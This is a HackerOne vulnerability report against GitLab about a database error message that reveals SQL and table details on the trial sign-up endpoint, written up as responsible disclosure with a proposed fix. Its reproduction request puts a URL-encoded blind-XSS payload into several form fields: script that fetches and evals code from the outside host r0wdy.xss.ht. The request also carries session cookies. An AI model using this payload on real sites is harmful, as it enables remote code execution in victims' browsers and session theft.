DB Query disclosure through error message in "Start a Free Gold Trial" feature
HackerOne report #927090 by natarajankv91
on 2020-07-18, assigned to @rchan-gitlab:
NOTE! Thanks for submitting a report! Please replace all the (parenthesized) sections below with the pertinent details. Remember, the more detail you provide, the easier it is for us to triage and respond quickly, so be sure to take your time filling out the report!
Summary
It was possible to generate DB error message which can tell us that DB user - PostgreSQL, and table details where Gold trial customer details are stored.
Steps to reproduce
(Step-by-step guide to reproduce the issue, including:)
-
Login to gitlab
-
complete HTTP or API request
POST /-/trials/create_lead?glm_content=user-billing&glm_source=gitlab.com HTTP/1.1
Host: gitlab.com
Connection: close
Content-Length: 900
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: https://gitlab.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://gitlab.com/-/trials/create_lead?glm_content=user-billing&glm_source=gitlab.com
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: __cfduid=d025a068c1e6b10400ca0e3ce662e50341595102310; experimentation_subject_id=eyJfcmFpbHMiOnsibWVzc2FnZSI6IklqWTFZVFEyWVdJMExXTmpORGN0TkRFek5DMDVNVGd6TFdJd1lqYzBZV001T1RNME1TST0iLCJleHAiOm51bGwsInB1ciI6ImNvb2tpZS5leHBlcmltZW50YXRpb25fc3ViamVjdF9pZCJ9fQ%3D%3D--3bba54388eee452727c84fcd0050d62d219d7212; cf_clearance=e4cec6f228b299661faa332c3c577e717f7090f5-1595102324-0-1z8820654aza8867a22zc6719c0b-150; _sp_ses.6b85=*; known_sign_in=NlVMY25ndmR4d0lBOW9NNkJJcHpxejZiajZ1RmV4b3dlTVZYYXdMMXh2RDRjVjBMb1cwUkdMdXpiMCswckdoeFhWUnlHb0hYLzFMSGVZRzZRelppY2EwWnVYc253dHM0Y20zOVZsYzhwZVFiMGExeG1aVlAvSjQ3dU1oWGtNYTc5N0tPNUtTZGIvUTZaUlB2RXErMGdBPT0tLU1qTTVXZEF0NWZYSDd3aklaRUhmcnc9PQ%3D%3D--65992ae7013a1d327c6f8c52da7df37078ea0100; _gitlab_session=90edf0d04a24cc884d0e3827f49ac13e; event_filter=all; _sp_id.6b85=e897f6a0-e541-4cff-9032-87c97aee745d.1595102326.1.1595104586.1595102326.cf9dfc01-9b30-4866-b457-1c98bcd83065
utf8=%E2%9C%93&authenticity_token=gkimQU1IFG465MikyPK0Y6QDQIFyCQgXmZjPX%2BhfL78Qmqr%2B0%2FlP%2FUSVuQJZQv%2B71cdW3HgL4zCkCX7jA81tiQ%3D%3D&first_name=Natarajan&last_name=%3Cscript%3Efunction+b%28%29%7Beval%28this.responseText%29%7D%3Ba%3Dnew+XMLHttpRequest%28%29%3Ba.addEventListener%28%22load%22%2C+b%29%3Ba.open%28%22GET%22%2C+%22%2F%2Fr0wdy.xss.ht%22%29%3Ba.send%28%29%3B%3C%2Fscript%3E&company_name=%3Cscript%3Efunction+b%28%29%7Beval%28this.responseText%29%7D%3Ba%3Dnew+XMLHttpRequest%28%29%3Ba.addEventListener%28%22load%22%2C+b%29%3Ba.open%28%22GET%22%2C+%22%2F%2Fr0wdy.xss.ht%22%29%3Ba.send%28%29%3B%3C%2Fscript%3E&company_size=1-99&phone_number=%3Cscript%3Efunction+b%28%29%7Beval%28this.responseText%29%7D%3Ba%3Dnew+XMLHttpRequest%28%29%3Ba.addEventListener%28%22load%22%2C+b%29%3Ba.open%28%22GET%22%2C+%22%2F%2Fr0wdy.xss.ht%22%29%3Ba.send%28%29%3B%3C%2Fscript%3E&number_of_users=1&country=AE
- user action - submit the request and you will observe backend DB error message.
Impact
User can understand the backend DB structure of gitlab and plan for further enumeration and attacks on the same.
What is the current bug behavior?
Screenshots attached - error message displaying the failed SQL query is displayed.
What is the expected correct behavior?
Generic error message to be displayed
Relevant logs and/or screenshots
attached.
Output of checks
This bug happens on Gitlab.com
Results of GitLab environment info
NA
Impact
Attacker can understand the DB being used, how the data is being stored in the backend and can plan further attacks on the same.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
- [REDACTED]
Fix Approach
Modify http_post
and also http_get
for SubscriptionPortal to log the error, but to display a generic eror message for the customer.